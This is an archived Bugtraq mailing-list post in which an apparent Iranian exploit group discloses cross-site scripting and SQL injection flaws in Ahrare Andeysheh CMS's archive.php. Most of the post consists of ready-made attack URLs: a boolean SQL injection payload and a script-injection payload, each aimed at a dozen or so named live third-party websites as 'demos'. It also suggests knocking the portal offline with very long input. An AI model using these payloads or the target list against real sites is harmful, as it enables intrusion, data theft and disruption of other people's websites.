| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 16 Apr 2016 18:45:31 GMT
From: iesb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Ahrare Andeysheh Cms Multiple Vulnerabilities
Xss and sqli and poc on ahrare andeysheh cms to all versions
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# Ahrare Andeysheh Cms Multiple Vulnerabilities
# Vulnerability : Xss & Sql Injection & Poc
# Vulnerability on : archive.php
# Version : All Versions
# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
# Vendor site : http://www.ahrareandeysheh.com/
# Author : IeDb.Ir
# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir
# Vulnerability attack information site : http://xssed.Ir/
# Archive Exploit = http://kkli.ir/aOFh6
#####################################
# Bug :
[Xss And Sql Injection] to from=1395/01/01
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999
Poc :
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--
# Dem0 [ Xss And Sqli]
http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
Demo [Poc]
http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--
Insert Java Code Or very long input, and disrupt the system And This portal will be unavailable.
# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
#####################################
Tnks To : All Member In Iedb.ir And Iedb.ir/acc
B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4
Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum
#####################################
# Archive Exploit = http://iedb.ir/exploits-5061.html
#####################################
Powered by blists - more mailing lists